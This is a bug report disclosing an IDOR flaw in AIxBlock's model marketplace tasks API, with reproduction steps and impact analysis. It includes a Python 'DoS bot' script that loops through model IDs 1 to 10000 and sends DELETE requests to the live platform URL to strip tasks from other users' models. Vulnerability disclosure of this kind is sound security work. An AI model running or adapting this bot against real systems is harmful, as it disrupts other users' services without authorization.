Describe the bug
A critical Insecure Direct Object Reference (IDOR) vulnerability exists in the AIxBlock platform's model marketplace tasks API endpoints. Attackers can manipulate model IDs in API requests to perform unauthorized operations on other users' models, including task assignment and unassignment operations.

Important Clarification: The DELETE endpoint does NOT delete the model itself. Instead, it manages task assignments for models. The DELETE request with {"task_ids":[]} unassigns all tasks from the specified model, while the POST request with {"task_ids":[2]} assigns specific tasks to the model.

CVSS v3.1: 7.1 (High) - Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

To Reproduce
Steps to reproduce the behavior:

1. Create a model with ID 856 (or any valid model ID)

2. Send a POST request to /api/model_marketplace_tasks/858 with {"task_ids":[]}, observe that the request returns HTTP 200 with success message.

3. Send a DELETE request to /api/model_marketplace_tasks/858 with {"task_ids":[]}, observe that the request returns HTTP 200 with success message.

4. Change the model ID to any other number (e.g., 999, 12345, etc.), send the same DELETE/POST requests and observe that the request still returns HTTP 200 with success message.

5. Any non-existent IDs return 404 with a clear message: "ModelMarketplace not found".

Expected behavior
The API should validate that the authenticated user has permission to perform operations on the specified model ID. Only the model owner or authorized users should be able to assign/unassign tasks to/from models.

Automated DoS Attack Potential

Bot Attack Scenario

An attacker could create a simple bot that:

1. Discovers Model IDs:

   • Enumerate model IDs by testing sequential numbers (1, 2, 3, 4...)
   • Use the model listing API to get all available model IDs
   • Target specific high-value models

2. Systematic Task Unassignment:

   # Example DoS Bot import requests import time def dos_attack(): session = requests.Session() session.headers.update({ 'Authorization': 'Bearer <token>', 'Content-Type': 'application/json' }) # Attack all models from ID 1 to 10000 for model_id in range(1, 10001): try: # Unassign all tasks from each model response = session.delete( f'https://app.aixblock.io/api/model_marketplace_tasks/{model_id}', json={"task_ids": []} ) if response.status_code == 200: print(f"Successfully disrupted model {model_id}") except: pass time.sleep(0.1) # Rate limiting dos_attack()

3. Continuous Disruption:

   • Run the bot every few minutes to re-disrupt models
   • Target newly created models automatically
   • Focus on popular/high-traffic models

Impact of Automated Attacks

• Platform-Wide DoS: Single bot can disrupt thousands of models
• Persistent Disruption: Models remain broken until owners manually reassign tasks
• Resource Exhaustion: Continuous API calls can overwhelm the server
• User Experience: Legitimate users experience constant model failures
• Business Impact: Platform becomes unreliable, users may leave

Environment:

• OS: Windows 10
• Browser: Chrome 140.0.0.0
• Application: AIxBlock Platform
• API Base URL: https://app.aixblock.io

Additional context
This vulnerability allows attackers to:

1. Manipulate task assignments for any model in the system
2. Perform unauthorized operations on other users' models
3. Bypass authorization checks by simply changing the model ID in the URL
4. Potentially disrupt other users' workflows by modifying their model task assignments